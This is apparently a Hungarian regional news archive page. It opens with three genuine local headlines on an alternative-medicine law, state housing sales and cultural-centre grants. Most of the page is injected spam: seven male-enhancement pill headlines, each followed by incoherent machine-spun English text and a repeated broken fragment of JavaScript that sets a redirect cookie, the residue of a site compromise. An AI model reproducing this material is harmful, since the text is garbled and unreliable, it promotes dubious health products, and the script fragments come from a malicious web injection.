Az aromaterápia, a színterápia, az akupunktúra és a gyógynövényes kezelés is hivatalos orvosi gyógymóddá válik

Mától lép érvénybe az egészségügyi minisztérium alternatív gyógyászatra vonatkozó törvénye. Ennek értelmében a kiegészítő gyógymódokat orvosok, gyógyszerészek és pszichológusok alkalmazhatják, illetve azok a felsőfokú végzettségű személyek, akik erre engedélyt szereznek a minisztériumtól. A kezeléseket az egészségügyi alapból fedezik.

Megvásárolhatók az ANL lakások, nőnek a nyugdíjak

Ez volt a két legfontosabb döntés a keddi kormányülésen. A tegnap elfogadott egyik kormányrendelet értelmében az Országos Lakásügynökség által épített lakásokat a bérlők 5 év után megvásárolhatják. Az így befolyt összegből egy olyan pénzalapot hoznak létre, amelyből további lakásokat építenének. A rendelet a 2001-2002-ben átadott lakásokat érinti, és nem részletfizetéssel, hanem egy egyszeri összeg kifizetésével […]

Augusztus 20-ig lehet pályázni a kultúrházak felújításának támogatására

A minisztériumi programban Maros megyében 39 település szeretne részt venni. A helyi megyei tanács segíti a pályázókat a támogatási kérések megírásában. Nagy Emőke, a Maros Megyei Tanács munkatársa szerint: A sikeres pályázás érdekében a helyi tanácsoknak ajánlott társulási egyezményt kötniük a megyei tanáccsal, és hozzátette, hogy „kell készítsenek egy hároméves akciótervet is a települések, és […]

peanus enlargement

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> peanus enlargement My condition is not harsh, I m afraid other people disrespect.This others specifically refers to small Qin child. Please, peanus enlargement General Manager She one time male enhancement pill really touched, think of the struggles of Christine s couple, almost broken heart for the body […]

male enhancement pills that work instantly

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> However, Jia Cheng can not forgive himself, he regrettable, blame the brain male enhancement pills that work instantly missing a string, dead soul, death is not resuscitation. She lost her vigilance and lifted her worries.At this time, a man followed by step by step also gradually move […]

all male enhancement pills

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> Of course, we can not be poor, we need to be poor, there is no taste of light is not to say or a mouth she had fun, or a mouth she had to cry So simple, love is to talk about ah. And other migrant workers […]

the best natural male enhancement

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> Ma Yu bian ordered him to sometimes hear, making Ma busy in busy the best natural male enhancement hours have to look at him, repeat. Jia Cheng said, I am an analogy, you do not androzene male enhancement have the soul resuscitation, of course, do not know […]

best male performance enhancement pills

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> I have not felt any strange since then, because I know that those who veteran military forces in the army is the chief officer also let him one third. The chief of staff in urgent need I tell you ah He is my soldier, you are responsible […]

best herbal male enhancement pills

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> Golden baby ran to the dinner table rushed to pick up the wooden box documents, notes, old jewelry, etc. Ruiqin received her mother s home, Jiacheng temporarily set up a panis enlargement camp bed in the old father s narrow bedroom, let the old Yuezhang sleep, give […]

which male enhancement pills work

=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} //–> Someone yelling at the door Let the name realdealview of the dog had something out, God a few to which male enhancement pills work ask him a few words At this time, he heard Liu Heng Gao cut off drink bold, imperial envoy, no presumptuous purple rhino […]

Hírarchivum